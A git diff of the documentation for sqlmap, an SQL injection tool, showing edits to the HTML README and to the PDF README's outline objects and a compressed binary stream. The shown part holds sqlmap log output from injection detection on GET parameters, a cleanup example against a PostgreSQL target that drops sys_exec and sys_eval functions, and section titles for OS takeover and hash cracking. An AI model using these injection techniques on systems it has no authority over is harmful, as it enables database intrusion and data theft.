-[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
-[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
-[hh:mm:22] [INFO] GET parameter 'name' is dynamic
-[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
-[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
-[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
-[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
-[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
-[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
-[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go
-ahead:
-[0] place: GET, parameter: id, type: numeric (default)
-[1] place: GET, parameter: name, type: stringsingle
-[q] Quit
-Choice: 0
-[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
-[...]
-back-end DBMS:  MySQL >= 5.0.0
-
    -
    -

    - -

    As you can see, sqlmap by default chose the injection payload to the first -vulnerable parameter.

    +when sqlmap requires it, you can force that by using +--batch switch. This will leave sqlmap to go with a +default behaviour whenever user's input would be required.

    -

    Cleanup the DBMS by sqlmap specific UDF(s) and table(s)

    +

    5.16 Miscellaneous +

    -

    Option: --cleanup

    +

    TODO

    + +

    Switch: --beep

    + +

    TODO

    + + +

    TODO

    + +

    Switch: --check-payload

    + +

    TODO

    + + +

    Cleanup the DBMS from sqlmap specific UDF(s) and table(s)

    + +

    Switch: --cleanup

    It is recommended to clean up the back-end database management system from sqlmap temporary table(s) and created user-defined function(s) when you -are done with owning the underlying operating system or file system.

    - -

    Example on a PostgreSQL 8.3.5 target:

    -

    -

    -
    -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/iis/get_int.aspx?id=1" \
-  -v 2 --cleanup
-
-[...]
-[hh:mm:18] [INFO] cleaning up the database management system
-[hh:mm:18] [DEBUG] removing support tables
-[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapoutput
-do you want to remove sys_exec UDF? [Y/n] 
-[hh:mm:20] [DEBUG] removing sys_exec UDF
-[hh:mm:20] [DEBUG] query: DROP FUNCTION sys_exec(text)
-do you want to remove sys_eval UDF? [Y/n] 
-[hh:mm:21] [DEBUG] removing sys_eval UDF
-[hh:mm:21] [DEBUG] query: DROP FUNCTION sys_eval(text)
-[hh:mm:21] [INFO] database management system cleanup finished
-[hh:mm:21] [WARNING] remember that UDF shared library files saved on the file system can 
-only be deleted manually
-
    -
    -

    +are done taking over the underlying operating system or file system. +Switch --cleanup will attempt to clean up the DBMS and +the file system wherever possible.

    -

    6. Disclaimer

    +

    TODO

    + +

    Switch: --forms

    + +

    TODO

    + + +

    Use Google dork results from specified page number

    + +

    Switch: --gpage

    + +

    Default sqlmap behavior with option -g is to do a Google +search and use the first 100 resulting URLs for further SQL injection +testing. However, in combination with this option you can specify with +this switch, --gpage, some page other than the first one +to retrieve target URLs from.

    + + +

    TODO

    + +

    Switch: --parse-errors

    + +

    TODO

    + + +

    TODO

    + +

    Switch: --replicate

    + +

    TODO

    + + +

    6. License and copyright

    + +

    sqlmap is released under the terms of the +General Public License v2. +sqlmap is copyrighted by its +developers.

    + + +

    7. Disclaimer

    sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS @@ -6242,7 +2763,7 @@ that such action might get you in trouble with a lot of law enforcement agencies.

    -

    7. Authors

    +

    8. Authors

    Bernardo Damele A. G. (inquis) - Lead developer. diff --git a/doc/README.pdf b/doc/README.pdf index 481b0ee6f..c5eecbed3 100644 --- a/doc/README.pdf +++ b/doc/README.pdf @@ -1,2261 +1,1714 @@ %PDF-1.4 %ÐÔÅØ -5 0 obj +1 0 obj << /S /GoTo /D (section.1) >> endobj -8 0 obj +4 0 obj (Introduction) endobj -9 0 obj +5 0 obj << /S /GoTo /D (subsection.1.1) >> endobj -12 0 obj +8 0 obj (Requirements) endobj -13 0 obj +9 0 obj << /S /GoTo /D (subsection.1.2) >> endobj -16 0 obj +12 0 obj (Scenario) endobj +13 0 obj +<< /S /GoTo /D (subsubsection.1.2.1) >> +endobj +16 0 obj +(Detect and exploit a SQL injection) +endobj 17 0 obj -<< /S /GoTo /D (subsection.1.3) >> +<< /S /GoTo /D (subsubsection.1.2.2) >> endobj 20 0 obj -(Techniques) +(Direct connection to the database management system) endobj 21 0 obj -<< /S /GoTo /D (subsection.1.4) >> +<< /S /GoTo /D (subsection.1.3) >> endobj 24 0 obj -(Demo) +(Techniques) endobj 25 0 obj -<< /S /GoTo /D (subsection.1.5) >> +<< /S /GoTo /D (subsection.1.4) >> endobj 28 0 obj -(History) +(Demo) endobj 29 0 obj -<< /S /GoTo /D (subsubsection.1.5.1) >> -endobj -32 0 obj -(2010) -endobj -33 0 obj -<< /S /GoTo /D (subsubsection.1.5.2) >> -endobj -36 0 obj -(2009) -endobj -37 0 obj -<< /S /GoTo /D (subsubsection.1.5.3) >> -endobj -40 0 obj -(2008) -endobj -41 0 obj -<< /S /GoTo /D (subsubsection.1.5.4) >> -endobj -44 0 obj -(2007) -endobj -45 0 obj -<< /S /GoTo /D (subsubsection.1.5.5) >> -endobj -48 0 obj -(2006) -endobj -49 0 obj << /S /GoTo /D (section.2) >> endobj -52 0 obj +32 0 obj (Features) endobj -53 0 obj +33 0 obj << /S /GoTo /D (subsection.2.1) >> endobj -56 0 obj +36 0 obj (Generic features) endobj -57 0 obj +37 0 obj << /S /GoTo /D (subsection.2.2) >> endobj -60 0 obj +40 0 obj (Fingerprint and enumeration features) endobj -61 0 obj +41 0 obj << /S /GoTo /D (subsection.2.3) >> endobj -64 0 obj +44 0 obj (Takeover features) endobj -65 0 obj +45 0 obj << /S /GoTo /D (section.3) >> endobj +48 0 obj +(History) +endobj +49 0 obj +<< /S /GoTo /D (subsection.3.1) >> +endobj +52 0 obj +(2011) +endobj +53 0 obj +<< /S /GoTo /D (subsection.3.2) >> +endobj +56 0 obj +(2010) +endobj +57 0 obj +<< /S /GoTo /D (subsection.3.3) >> +endobj +60 0 obj +(2009) +endobj +61 0 obj +<< /S /GoTo /D (subsection.3.4) >> +endobj +64 0 obj +(2008) +endobj +65 0 obj +<< /S /GoTo /D (subsection.3.5) >> +endobj 68 0 obj -(Download and update) +(2007) endobj 69 0 obj -<< /S /GoTo /D (section.4) >> +<< /S /GoTo /D (subsection.3.6) >> endobj 72 0 obj -(License and copyright) +(2006) endobj 73 0 obj -<< /S /GoTo /D (section.5) >> +<< /S /GoTo /D (section.4) >> endobj 76 0 obj -(Usage) +(Download and update) endobj 77 0 obj -<< /S /GoTo /D (subsection.5.1) >> +<< /S /GoTo /D (section.5) >> endobj 80 0 obj -(Output verbosity) +(Usage) endobj 81 0 obj -<< /S /GoTo /D (subsection.5.2) >> +<< /S /GoTo /D (subsection.5.1) >> endobj 84 0 obj -(Target) +(Output verbosity) endobj 85 0 obj -<< /S /GoTo /D (subsubsection.5.2.1) >> +<< /S /GoTo /D (subsection.5.2) >> endobj 88 0 obj -(Target URL) +(Target) endobj 89 0 obj -<< /S /GoTo /D (subsubsection.5.2.2) >> +<< /S /GoTo /D (subsubsection.5.2.1) >> endobj 92 0 obj -(Parse targets from Burp or WebScarab proxy logs) +(Target URL) endobj 93 0 obj -<< /S /GoTo /D (subsubsection.5.2.3) >> +<< /S /GoTo /D (subsubsection.5.2.2) >> endobj 96 0 obj -(Load HTTP request from a file) +(Parse targets from Burp or WebScarab proxy logs) endobj 97 0 obj -<< /S /GoTo /D (subsubsection.5.2.4) >> +<< /S /GoTo /D (subsubsection.5.2.3) >> endobj 100 0 obj -(Process Google dork results as target addresses) +(Load HTTP request from a file) endobj 101 0 obj -<< /S /GoTo /D (subsubsection.5.2.5) >> +<< /S /GoTo /D (subsubsection.5.2.4) >> endobj 104 0 obj -(Load options from a configuration INI file) +(Process Google dork results as target addresses) endobj 105 0 obj -<< /S /GoTo /D (subsection.5.3) >> +<< /S /GoTo /D (subsubsection.5.2.5) >> endobj 108 0 obj -(Request) +(Load options from a configuration INI file) endobj 109 0 obj -<< /S /GoTo /D (subsubsection.5.3.1) >> +<< /S /GoTo /D (subsection.5.3) >> endobj 112 0 obj -(HTTP method: GET or POST) +(Request) endobj 113 0 obj -<< /S /GoTo /D (subsubsection.5.3.2) >> +<< /S /GoTo /D (subsubsection.5.3.1) >> endobj 116 0 obj -(HTTP Cookie header) +(HTTP data) endobj 117 0 obj -<< /S /GoTo /D (subsubsection.5.3.3) >> +<< /S /GoTo /D (subsubsection.5.3.2) >> endobj 120 0 obj -(HTTP User-Agent header) +(HTTP Cookie header) endobj 121 0 obj -<< /S /GoTo /D (subsubsection.5.3.4) >> +<< /S /GoTo /D (subsubsection.5.3.3) >> endobj 124 0 obj -(HTTP Referer header) +(HTTP User-Agent header) endobj 125 0 obj -<< /S /GoTo /D (subsubsection.5.3.5) >> +<< /S /GoTo /D (subsubsection.5.3.4) >> endobj 128 0 obj -(Extra HTTP headers) +(HTTP Referer header) endobj 129 0 obj -<< /S /GoTo /D (subsubsection.5.3.6) >> +<< /S /GoTo /D (subsubsection.5.3.5) >> endobj 132 0 obj -(HTTP Basic, Digest and NTLM authentications) +(Extra HTTP headers) endobj 133 0 obj -<< /S /GoTo /D (subsubsection.5.3.7) >> +<< /S /GoTo /D (subsubsection.5.3.6) >> endobj 136 0 obj -(HTTP Certificate authentication) +(HTTP protocol authentication) endobj 137 0 obj -<< /S /GoTo /D (subsubsection.5.3.8) >> +<< /S /GoTo /D (subsubsection.5.3.7) >> endobj 140 0 obj -(HTTP proxy) +(HTTP protocol certificate authentication) endobj 141 0 obj -<< /S /GoTo /D (subsubsection.5.3.9) >> +<< /S /GoTo /D (subsubsection.5.3.8) >> endobj 144 0 obj -(Concurrent HTTP requests) +(HTTP\(S\) proxy) endobj 145 0 obj -<< /S /GoTo /D (subsubsection.5.3.10) >> +<< /S /GoTo /D (subsubsection.5.3.9) >> endobj 148 0 obj -(Delay in seconds between each HTTP request) +(Delay between each HTTP request) endobj 149 0 obj -<< /S /GoTo /D (subsubsection.5.3.11) >> +<< /S /GoTo /D (subsubsection.5.3.10) >> endobj 152 0 obj (Seconds to wait before timeout connection) endobj 153 0 obj -<< /S /GoTo /D (subsubsection.5.3.12) >> +<< /S /GoTo /D (subsubsection.5.3.11) >> endobj 156 0 obj (Maximum number of retries when the HTTP connection timeouts) endobj 157 0 obj -<< /S /GoTo /D (subsubsection.5.3.13) >> +<< /S /GoTo /D (subsubsection.5.3.12) >> endobj 160 0 obj (Filtering targets from provided proxy log using regular expression) endobj 161 0 obj -<< /S /GoTo /D (subsection.5.4) >> +<< /S /GoTo /D (subsubsection.5.3.13) >> endobj 164 0 obj -(Injection) +(Avoid your session to be destroyed after too many unsuccessful requests) endobj 165 0 obj -<< /S /GoTo /D (subsubsection.5.4.1) >> +<< /S /GoTo /D (subsection.5.4) >> endobj 168 0 obj -(Testable parameter\(s\)) +(Optimization) endobj 169 0 obj -<< /S /GoTo /D (subsubsection.5.4.2) >> +<< /S /GoTo /D (subsubsection.5.4.1) >> endobj 172 0 obj -(Force the database management system name) +(Bundle optimization) endobj 173 0 obj -<< /S /GoTo /D (subsubsection.5.4.3) >> +<< /S /GoTo /D (subsubsection.5.4.2) >> endobj 176 0 obj -(Force the database management system operating system name) +(Output prediction) endobj 177 0 obj -<< /S /GoTo /D (subsubsection.5.4.4) >> +<< /S /GoTo /D (subsubsection.5.4.3) >> endobj 180 0 obj -(Custom injection payload) +(HTTP Keep-Alive) endobj 181 0 obj -<< /S /GoTo /D (subsubsection.5.4.5) >> +<< /S /GoTo /D (subsubsection.5.4.4) >> endobj 184 0 obj -(Page comparison) +(HTTP NULL connection) endobj 185 0 obj -<< /S /GoTo /D (subsubsection.5.4.6) >> +<< /S /GoTo /D (subsubsection.5.4.5) >> endobj 188 0 obj -(Exclude specific page content) +(Concurrent HTTP\(S\) requests) endobj 189 0 obj -<< /S /GoTo /D (subsection.5.5) >> +<< /S /GoTo /D (subsubsection.5.4.6) >> endobj 192 0 obj -(Techniques) +(MySQL GROUP\137CONCAT\(\) speed up) endobj 193 0 obj -<< /S /GoTo /D (subsubsection.5.5.1) >> +<< /S /GoTo /D (subsection.5.5) >> endobj 196 0 obj -(Test for stacked queries \(multiple statements\) support) +(Injection) endobj 197 0 obj -<< /S /GoTo /D (subsubsection.5.5.2) >> +<< /S /GoTo /D (subsubsection.5.5.1) >> endobj 200 0 obj -(Test for time based blind SQL injection) +(Testable parameter\(s\)) endobj 201 0 obj -<< /S /GoTo /D (subsubsection.5.5.3) >> +<< /S /GoTo /D (subsubsection.5.5.2) >> endobj 204 0 obj -(Test for UNION query SQL injection) +(Force the database management system name) endobj 205 0 obj -<< /S /GoTo /D (subsubsection.5.5.4) >> +<< /S /GoTo /D (subsubsection.5.5.3) >> endobj 208 0 obj -(Use the UNION query SQL injection) +(Force the database management system operating system name) endobj 209 0 obj -<< /S /GoTo /D (subsection.5.6) >> +<< /S /GoTo /D (subsubsection.5.5.4) >> endobj 212 0 obj -(Fingerprint) +(Custom injection payload) endobj 213 0 obj -<< /S /GoTo /D (subsubsection.5.6.1) >> +<< /S /GoTo /D (subsubsection.5.5.5) >> endobj 216 0 obj -(Extensive database management system fingerprint) +(Tamper injection data) endobj 217 0 obj -<< /S /GoTo /D (subsection.5.7) >> +<< /S /GoTo /D (subsection.5.6) >> endobj 220 0 obj -(Enumeration) +(Detection) endobj 221 0 obj -<< /S /GoTo /D (subsubsection.5.7.1) >> +<< /S /GoTo /D (subsubsection.5.6.1) >> endobj 224 0 obj -(Banner) +(Level) endobj 225 0 obj -<< /S /GoTo /D (subsubsection.5.7.2) >> +<< /S /GoTo /D (subsubsection.5.6.2) >> endobj 228 0 obj -(Session user) +(Risk) endobj 229 0 obj -<< /S /GoTo /D (subsubsection.5.7.3) >> +<< /S /GoTo /D (subsubsection.5.6.3) >> endobj 232 0 obj -(Current database) +(TODO: Page comparison) endobj 233 0 obj -<< /S /GoTo /D (subsubsection.5.7.4) >> +<< /S /GoTo /D (subsection.5.7) >> endobj 236 0 obj -(Detect if the session user is a database administrator \(DBA\)) +(Techniques) endobj 237 0 obj -<< /S /GoTo /D (subsubsection.5.7.5) >> +<< /S /GoTo /D (subsubsection.5.7.1) >> endobj 240 0 obj -(Users) +(Seconds to delay the DBMS response for time-based blind SQL injection) endobj 241 0 obj -<< /S /GoTo /D (subsubsection.5.7.6) >> +<< /S /GoTo /D (subsubsection.5.7.2) >> endobj 244 0 obj -(Users password hashes) +(TODO) endobj 245 0 obj -<< /S /GoTo /D (subsubsection.5.7.7) >> +<< /S /GoTo /D (subsubsection.5.7.3) >> endobj 248 0 obj -(Users privileges) +(TODO) endobj 249 0 obj -<< /S /GoTo /D (subsubsection.5.7.8) >> -endobj -252 0 obj -(Available databases) -endobj -253 0 obj -<< /S /GoTo /D (subsubsection.5.7.9) >> -endobj -256 0 obj -(Databases tables) -endobj -257 0 obj -<< /S /GoTo /D (subsubsection.5.7.10) >> -endobj -260 0 obj -(Database table columns) -endobj -261 0 obj -<< /S /GoTo /D (subsubsection.5.7.11) >> -endobj -264 0 obj -(Dump database table entries) -endobj -265 0 obj -<< /S /GoTo /D (subsubsection.5.7.12) >> -endobj -268 0 obj -(Dump all databases tables entries) -endobj -269 0 obj -<< /S /GoTo /D (subsubsection.5.7.13) >> -endobj -272 0 obj -(Execute custom SQL statement) -endobj -273 0 obj << /S /GoTo /D (subsection.5.8) >> endobj -276 0 obj -(User-defined function injection) +252 0 obj +(Fingerprint) endobj -277 0 obj +253 0 obj << /S /GoTo /D (subsubsection.5.8.1) >> endobj -280 0 obj -(Inject custom user-defined functions \(UDF\)) +256 0 obj +(TODO: Extensive database management system fingerprint) endobj -281 0 obj +257 0 obj << /S /GoTo /D (subsection.5.9) >> endobj -284 0 obj -(File system access) +260 0 obj +(Enumeration) endobj -285 0 obj +261 0 obj << /S /GoTo /D (subsubsection.5.9.1) >> endobj -288 0 obj -(Read a file from the database server's file system) +264 0 obj +(Banner) endobj -289 0 obj +265 0 obj << /S /GoTo /D (subsubsection.5.9.2) >> endobj +268 0 obj +(Session user) +endobj +269 0 obj +<< /S /GoTo /D (subsubsection.5.9.3) >> +endobj +272 0 obj +(Current database) +endobj +273 0 obj +<< /S /GoTo /D (subsubsection.5.9.4) >> +endobj +276 0 obj +(Detect whether or not the session user is a database administrator) +endobj +277 0 obj +<< /S /GoTo /D (subsubsection.5.9.5) >> +endobj +280 0 obj +(List database management system users) +endobj +281 0 obj +<< /S /GoTo /D (subsubsection.5.9.6) >> +endobj +284 0 obj +(List and crack database management system users password hashes) +endobj +285 0 obj +<< /S /GoTo /D (subsubsection.5.9.7) >> +endobj +288 0 obj +(List database management system users privileges) +endobj +289 0 obj +<< /S /GoTo /D (subsubsection.5.9.8) >> +endobj 292 0 obj -(Write a local file on the database server's file system) +(List database management system users roles) endobj 293 0 obj -<< /S /GoTo /D (subsection.5.10) >> +<< /S /GoTo /D (subsubsection.5.9.9) >> endobj 296 0 obj -(Operating system access) +(List database management system's databases) endobj 297 0 obj -<< /S /GoTo /D (subsubsection.5.10.1) >> +<< /S /GoTo /D (subsubsection.5.9.10) >> endobj 300 0 obj -(Execute arbitrary operating system command) +(Enumerate database's tables) endobj 301 0 obj -<< /S /GoTo /D (subsubsection.5.10.2) >> +<< /S /GoTo /D (subsubsection.5.9.11) >> endobj 304 0 obj -(Prompt for an out-of-band shell, Meterpreter or VNC) +(Enumerate database table columns) endobj 305 0 obj -<< /S /GoTo /D (subsubsection.5.10.3) >> +<< /S /GoTo /D (subsubsection.5.9.12) >> endobj 308 0 obj -(One click prompt for an out-of-band shell, meterpreter or VNC) +(Dump database table entries) endobj 309 0 obj -<< /S /GoTo /D (subsubsection.5.10.4) >> +<< /S /GoTo /D (subsubsection.5.9.13) >> endobj 312 0 obj -(Database stored procedure heap-based buffer overflow exploit) +(Dump all databases tables entries) endobj 313 0 obj -<< /S /GoTo /D (subsection.5.11) >> +<< /S /GoTo /D (subsubsection.5.9.14) >> endobj 316 0 obj -(Windows registry access) +(Search for columns, tables or databases) endobj 317 0 obj -<< /S /GoTo /D (subsubsection.5.11.1) >> +<< /S /GoTo /D (subsubsection.5.9.15) >> endobj 320 0 obj -(Read a Windows registry key value) +(Run custom SQL statement) endobj 321 0 obj -<< /S /GoTo /D (subsubsection.5.11.2) >> +<< /S /GoTo /D (subsection.5.10) >> endobj 324 0 obj -(Write a Windows registry key value) +(Brute force) endobj 325 0 obj -<< /S /GoTo /D (subsubsection.5.11.3) >> +<< /S /GoTo /D (subsubsection.5.10.1) >> endobj 328 0 obj -(Delete a Windows registry key) +(Brute force tables names) endobj 329 0 obj -<< /S /GoTo /D (subsubsection.5.11.4) >> +<< /S /GoTo /D (subsubsection.5.10.2) >> endobj 332 0 obj -(Auxiliary registry switches) +(Brute force columns names) endobj 333 0 obj -<< /S /GoTo /D (subsection.5.12) >> +<< /S /GoTo /D (subsection.5.11) >> endobj 336 0 obj -(Miscellaneous) +(User-defined function injection) endobj 337 0 obj -<< /S /GoTo /D (subsubsection.5.12.1) >> +<< /S /GoTo /D (subsubsection.5.11.1) >> endobj 340 0 obj -(Session file: save and resume all data retrieved) +(Inject custom user-defined functions \(UDF\)) endobj 341 0 obj -<< /S /GoTo /D (subsubsection.5.12.2) >> +<< /S /GoTo /D (subsection.5.12) >> endobj 344 0 obj -(Flush session file for current target) +(File system access) endobj 345 0 obj -<< /S /GoTo /D (subsubsection.5.12.3) >> +<< /S /GoTo /D (subsubsection.5.12.1) >> endobj 348 0 obj -(Estimated time of arrival) +(Read a file from the database server's file system) endobj 349 0 obj -<< /S /GoTo /D (subsubsection.5.12.4) >> +<< /S /GoTo /D (subsubsection.5.12.2) >> endobj 352 0 obj -(Use Google dork results from specified page number) +(Upload a file to the database server's file system) endobj 353 0 obj -<< /S /GoTo /D (subsubsection.5.12.5) >> +<< /S /GoTo /D (subsection.5.13) >> endobj 356 0 obj -(Update sqlmap) +(Operating system takeover) endobj 357 0 obj -<< /S /GoTo /D (subsubsection.5.12.6) >> +<< /S /GoTo /D (subsubsection.5.13.1) >> endobj 360 0 obj -(Save options in a configuration INI file) +(Run arbitrary operating system command) endobj 361 0 obj -<< /S /GoTo /D (subsubsection.5.12.7) >> +<< /S /GoTo /D (subsubsection.5.13.2) >> endobj 364 0 obj -(Act in non-interactive mode) +(Out-of-band stateful connection: Meterpreter \046 friends) endobj 365 0 obj -<< /S /GoTo /D (subsubsection.5.12.8) >> +<< /S /GoTo /D (subsection.5.14) >> endobj 368 0 obj -(Cleanup the DBMS by sqlmap specific UDF\(s\) and table\(s\)) +(Windows registry access) endobj 369 0 obj -<< /S /GoTo /D (section.6) >> +<< /S /GoTo /D (subsubsection.5.14.1) >> endobj 372 0 obj -(Disclaimer) +(Read a Windows registry key value) endobj 373 0 obj -<< /S /GoTo /D (section.7) >> +<< /S /GoTo /D (subsubsection.5.14.2) >> endobj 376 0 obj -(Authors) +(Write a Windows registry key value) endobj 377 0 obj -<< /S /GoTo /D [378 0 R /Fit ] >> +<< /S /GoTo /D (subsubsection.5.14.3) >> endobj -412 0 obj << -/Length 1317 +380 0 obj +(Delete a Windows registry key) +endobj +381 0 obj +<< /S /GoTo /D (subsubsection.5.14.4) >> +endobj +384 0 obj +(Auxiliary registry switches) +endobj +385 0 obj +<< /S /GoTo /D (subsection.5.15) >> +endobj +388 0 obj +(General) +endobj +389 0 obj +<< /S /GoTo /D (subsubsection.5.15.1) >> +endobj +392 0 obj +(TODO) +endobj +393 0 obj +<< /S /GoTo /D (subsubsection.5.15.2) >> +endobj +396 0 obj +(Session file: save and resume data retrieved) +endobj +397 0 obj +<< /S /GoTo /D (subsubsection.5.15.3) >> +endobj +400 0 obj +(Flush session file) +endobj +401 0 obj +<< /S /GoTo /D (subsubsection.5.15.4) >> +endobj +404 0 obj +(Estimated time of arrival) +endobj +405 0 obj +<< /S /GoTo /D (subsubsection.5.15.5) >> +endobj +408 0 obj +(Update sqlmap) +endobj +409 0 obj +<< /S /GoTo /D (subsubsection.5.15.6) >> +endobj +412 0 obj +(Save options in a configuration INI file) +endobj +413 0 obj +<< /S /GoTo /D (subsubsection.5.15.7) >> +endobj +416 0 obj +(Act in non-interactive mode) +endobj +417 0 obj +<< /S /GoTo /D (subsection.5.16) >> +endobj +420 0 obj +(Miscellaneous) +endobj +421 0 obj +<< /S /GoTo /D (subsubsection.5.16.1) >> +endobj +424 0 obj +(TODO) +endobj +425 0 obj +<< /S /GoTo /D (subsubsection.5.16.2) >> +endobj +428 0 obj +(TODO) +endobj +429 0 obj +<< /S /GoTo /D (subsubsection.5.16.3) >> +endobj +432 0 obj +(Cleanup the DBMS from sqlmap specific UDF\(s\) and table\(s\)) +endobj +433 0 obj +<< /S /GoTo /D (subsubsection.5.16.4) >> +endobj +436 0 obj +(TODO) +endobj +437 0 obj +<< /S /GoTo /D (subsubsection.5.16.5) >> +endobj +440 0 obj +(Use Google dork results from specified page number) +endobj +441 0 obj +<< /S /GoTo /D (subsubsection.5.16.6) >> +endobj +444 0 obj +(TODO) +endobj +445 0 obj +<< /S /GoTo /D (subsubsection.5.16.7) >> +endobj +448 0 obj +(TODO) +endobj +449 0 obj +<< /S /GoTo /D (section.6) >> +endobj +452 0 obj +(License and copyright) +endobj +453 0 obj +<< /S /GoTo /D (section.7) >> +endobj +456 0 obj +(Disclaimer) +endobj +457 0 obj +<< /S /GoTo /D (section.8) >> +endobj +460 0 obj +(Authors) +endobj +461 0 obj +<< /S /GoTo /D [462 0 R /Fit ] >> +endobj +495 0 obj << +/Length 1247 /Filter /FlateDecode >> stream -xÚíZKWã6ÞçWxWùœ‰ª—_Ý•2ô0 -™ÓÅ´ á(‰KÙfÊ¿¯dÉ!¶Ã#P(P¯d;ʽÖ÷é^]}2rfrFdÛ½ñàÇC8Aß'ž3ž:qæÁ€gñkÇ8„,ôŒãs—„àº2n¬Ê™5:8߆”2°'\ dõ"¼¾šdê)û< a®†¦AkÏ ¿²BÁ‡»œPð9‘Y¾à. À•1sVðtÅeÛfŒ`ÕG½·y’-MoÃæê3—±637·˜Ùça¤)D D3¤>ô#fÏ“Üô×CTNâ2ËÂ<ª*æÕ™áJa’›Û”WT™>!Õåî‘ç—Ð…²¢§@9¬Œ1ðq.⋆ -Vz 2ûKÄÅÝNæY*V|&¶13Í4˜²5´/4ïyan¯ ØÐ H”u)ó‰…©¹mü¨¡B5ù-ï¥là& $„µF°;ŒˆŽ”  -©¡$`RÆ…æ»1õ -TÝT¤·ºk„4€j¸ÎPCÖ+T~1"œŠË2‘B1¯¡Yb ›ùš¡6,ŠvûÛWë¯Í>Žk<Ý2‡‘å©žXžÎb±ä2É:üxÑÄò“F-ic7¤@Ä:²æËä²ðŠú?@õm#ÌÛ™0f Ûi'Â"õlüëþ¶ñæïÌ›gyû”äE&¯;ÔEaVÏ›ï匨"¨]~xU¢*Üu±ÚXÔBÖ#Žþû說CŠz’^)Iô†¤°'éH -A»!)èIz’‡’´±&y7$ù=I¯€¤–v2¤ YÔTPˆQPÝÈ‚¥lï²ZÂIø(á¤v¶NFb)d-iºÕ±$ÂA_W¾D¯ù©“Ãd9r%#lžørbD>#w•©¼X+«·±H<ÿ=³· ÷hÇìIšš¿¨TëJnµ¶Áý6ˆ™öÛ°Gnð⫵‡º?“b#ÖL¤Ô$ÒýLKÑß—‹Œë` ë¨QåÊÈÓZ0o¦Xχóë‹ñmý°îÙðÌŒçã$Ë\´œÆÙJ¿ÐµLfóJ$¿Û5y k;q=ãúkÞ92x¨áüf^òÖëÆ—²X•6]éC !ÏÝ¡j³<)ôýu·ò }l<%6vÕ½õ"b’™œ‰¢KJÐãÿìKQE_¸“ÄtÃáZbÚ`± -»¯§ÇÓÁ0ìƒëyØiU -š˜ZV:Ñ¥—¹=ã-xuâ>s1…=hžÊ,5¿î•re®2[Lüîª=™8?‹¹äçö˜¸²PÕ_›G‹lÖ=vÁäµ`û4P7f{-›u[üÓx|b®¤Ð‡OERnš?e‹Î¹xïòà¨8AG¼–tN¤ý~Bäö«‰‘yÍêF&™¼¨™ÈËEaûq;É‹äÄ'Õ'ï–ÈõßNÒ&è€zœ­ôîÌ¢5µ±Aj`³Ó7ΖzÏÊͽÜѯGwNnŸ¼¡½a|ÂÃíë"ÝøòCç„–qU÷Êó®™÷S·íÐL1·®hn2{*Š¹É6“ŸìKdc7‚Uû¼õ&ft0¶†mnYp -ê>™ÜfG-Ú×]N¾œCh¤F”Õ½ßñüy»Íö`<ø“ù+' +xÚíZÏw£6¾û¯àVñÞBõ ǦÙdÓ·»ÝM¼¯‡´+]!¶›ÿ¾ bŒ“ØΦ‰S.–ÀbFú¾Ñ̈:S:Ç#hÛƒñèç#:úŒáÀ_:!vBø!ÅÎx✃âz6ç ×#0e!äOEÕÀœ»YÉgî_ãßFoÇ£ëÒB¡ƒjû'™ª{”Eö#8R8—£ÏVsàÄ~Ì0k£È§Q`_¸87µp#UN­øÓã‘sîBÁpõDxÓ›äz‚„€C>3aú¿ø¦=ö­<³üZ +oîSBÀ‡TæÅŒ»8ߌ˜3Åç .We!J1Òcô¼…,Ò<3£¡¿1½\&•˜+s‰ ½!B•0H´„t<Â|SÈø*-Ìøj‰ZIRÎE¦Ì­æ/uU/™®4&…¹œóš*3Æ"¤‡Ü¿òâºt¦¥T&ÐCŽßÌëǨO(ÃvÚTÛ“™ô¯‚€º@w(Ô2Pwå8òCb… ׋qN´ ”¬¦Á¤LT…qgZz +>‰¾¨¤wªë˜žGièë;ž6À0 ­V_ëEcp*®ËT +vÅm»ˆŠ f +/€pÆÆñv<²y±úVwCqKZãªzÆ -OuøØòt–ˆŒË4ïñÄ{ˆå^‘> endobj -379 0 obj << +463 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] /Rect [84.837 715.552 190.43 726.342] /Subtype/Link/A<> >> endobj -380 0 obj << +464 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] /Rect [197.844 715.552 277.692 726.342] /Subtype/Link/A<> >> endobj -381 0 obj << +465 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] /Rect [251.615 678.858 282.797 689.981] /Subtype/Link/A<> >> endobj -382 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [368.039 678.858 411.837 689.981] -/Subtype/Link/A<> ->> endobj -383 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 611.458 151.087 620.326] -/Subtype /Link -/A << /S /GoTo /D (section.1) >> ->> endobj -384 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 590.745 170.274 601.536] -/Subtype /Link -/A << /S /GoTo /D (subsection.1.1) >> ->> endobj -385 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 573.906 147.393 582.76] -/Subtype /Link -/A << /S /GoTo /D (subsection.1.2) >> ->> endobj -386 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 553.193 158.765 563.984] -/Subtype /Link -/A << /S /GoTo /D (subsection.1.3) >> ->> endobj -387 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 536.353 136.161 545.207] -/Subtype /Link -/A << /S /GoTo /D (subsection.1.4) >> ->> endobj -388 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 515.641 